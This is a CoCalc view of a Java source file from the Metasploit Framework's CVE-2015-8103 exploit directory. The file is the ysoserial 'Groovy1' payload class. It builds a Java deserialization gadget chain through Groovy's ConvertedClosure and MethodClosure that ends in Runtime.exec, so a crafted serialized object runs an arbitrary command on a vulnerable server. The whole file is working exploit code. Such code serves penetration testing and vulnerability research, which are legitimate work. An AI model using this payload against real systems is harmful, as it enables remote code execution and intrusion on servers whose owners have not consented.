CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/exploits/CVE-2015-8103/payloads/Groovy1.java
Views: 11784
1
package ysoserial.payloads;

2


3
import java.lang.reflect.InvocationHandler;

4
import java.util.Map;

5


6
import org.codehaus.groovy.runtime.ConvertedClosure;

7
import org.codehaus.groovy.runtime.MethodClosure;

8


9
import ysoserial.payloads.annotation.Dependencies;

10
import ysoserial.payloads.util.Gadgets;

11
import ysoserial.payloads.util.PayloadRunner;

12


13
/*

14
	Gadget chain:	

15
		ObjectInputStream.readObject()

16
			PriorityQueue.readObject()

17
				Comparator.compare() (Proxy)

18
					ConvertedClosure.invoke()

19
						MethodClosure.call()

20
							...

21
						  		Method.invoke()

22
									Runtime.exec()

23
	

24
	Requires:

25
		groovy

26
 */

27


28
@SuppressWarnings({ "rawtypes", "unchecked" })

29
@Dependencies({"org.codehaus.groovy:groovy:2.3.9"})

30
public class Groovy1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {

31


32
	public InvocationHandler getObject(final String command) throws Exception {

33
		final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(command, "execute"), "entrySet");

34
		

35
		final Map map = Gadgets.createProxy(closure, Map.class);		

36


37
		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(map);

38
		

39
		return handler;

40
	}

41


42
	public static void main(final String[] args) throws Exception {

43
		PayloadRunner.run(Groovy1.class, args);

44
	}	

45
}

46


47